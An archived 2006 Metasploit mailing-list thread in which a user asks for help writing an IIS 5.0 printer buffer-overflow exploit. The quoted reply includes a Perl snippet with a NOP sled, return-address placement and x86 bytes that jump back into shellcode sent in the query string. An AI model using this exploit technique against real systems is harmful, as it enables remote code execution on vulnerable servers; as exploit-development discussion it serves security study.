Metasploit mailing list archives
iis50_printer_overflow
From: sonixxfx at gmail.com (Sonixxfx)
Date: Sat, 4 Mar 2006 08:44:56 +0100
It seems to me it would be good to do additional reading on this subject. I have seen some intresting things under the links section on the Metasploit website. Please let me know about other material I should read, especially if it would be a good addtion to Vinnie Liu's Chapter. Thanks. Regards, Ben 2006/3/3, Sonixxfx <sonixxfx at gmail.com>:
Thanks H D. I will take a look at this in the coming time, and I will let you know how it goes. I have looked if I could find the url I've used when I saw your picture, but I was unable to find it. Sorry. Regards, Ben 2006/3/2, H D Moore <hdm at metasploit.com>:On Thursday 02 March 2006 14:49, Sonixxfx wrote:I am trying to write an exploit for the "iis50_printer_overflow"[ snip ]The problem seems to be that I have few space available after the return address for the payload. I believe there is something about 240 bytes available. So my question is how can I make use of both thespaceavailable after the return address but also before the return address?If you look at our exploit, we cheat. We stick our shellcode into the query string and then find it again by dereferencing ebx+96 (which happens to be a pointer, that when has 256+64 added to it, leads back into our shellcode): my $pattern = $self->MakeNops(280); substr($pattern, 268, 4, pack("V", $target->[1])); # payload is at: [ebx + 96] + 256 + 64 $pattern .= "\x8b\x4b\x60"; # mov ecx, [ebx + 96] $pattern .= "\x80\xc1\x40"; # add cl, 64 $pattern .= "\x80\xc5\x01"; # add ch, 1 $pattern .= "\xff\xe1"; # jmp ecx my $request = "GET http://$pattern/null.printer?$shellcode...B.t.w. Nice looking man this morning on your website Metasploit ;)That lovely image appears if you browse the web site with a hostname that doesn't appear to be ' metasploit.com ' or one of our other domains. Let me know what URL you used to access the web site - it could be a bug. The purpose is to prevent people from hotlinking to images we host on our server. -HD
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20060304/c70efa3c/attachment.htm>
Current thread:
- iis50_printer_overflow Sonixxfx (Mar 02)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow Dave Killion (Mar 04)
- iis50_printer_overflow zodiac (Mar 04)
- iis50_printer_overflow Sonixxfx (Mar 07)
- iis50_printer_overflow H D Moore (Mar 07)
- iis50_printer_overflow Michael Boman (Mar 08)
- iis50_printer_overflow Peter Lee (Mar 08)
- iis50_printer_overflow pagvac (Mar 09)
- iis50_printer_overflow Sonixxfx (Mar 03)
- iis50_printer_overflow H D Moore (Mar 02)
- iis50_printer_overflow pagvac (Mar 09)
- iis50_printer_overflow Dave Killion (Mar 09)